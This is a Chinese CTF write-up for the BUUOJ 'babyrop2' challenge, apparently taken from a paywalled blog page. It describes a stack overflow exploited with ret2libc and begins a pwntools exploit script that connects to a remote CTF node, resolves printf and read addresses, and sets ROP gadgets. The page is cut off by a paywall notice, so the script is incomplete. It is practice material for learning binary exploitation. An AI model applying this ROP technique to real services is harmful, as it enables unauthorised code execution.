1.checksec

2.IDA

buf
很直接的栈溢出
ret2libc3
泄露libc基地址,计算system,bin/sh地址,覆盖返回地址
还要注意64位传参,寄存器的使用
3.EXP
from pwn import *
from LibcSearcher import LibcSearcher
#from LibcSearcherX import *
elf = ELF('./28babyrop2')
#libc = ELF("/root/Desktop/Pwn Subject/libc.so.6")
io = remote("node4.buuoj.cn",26955)
#io = process("/root/Desktop/Pwn Subject/babyrop2")
# Get Pot and Got
printf_plt = elf.plt['printf']
read_got = elf.got['read']
main = elf.symbols['main']
rdi = 0x0000000000400733
rsi

本文详细介绍了一个名为BabyROP2的简单程序中的栈溢出漏洞的利用过程。通过使用ROP技术,文章展示了如何泄露libc基地址,计算system及/bin/sh地址,并最终获得shell的过程。
最低0.47元/天 解锁文章
1800

被折叠的 条评论
为什么被折叠?



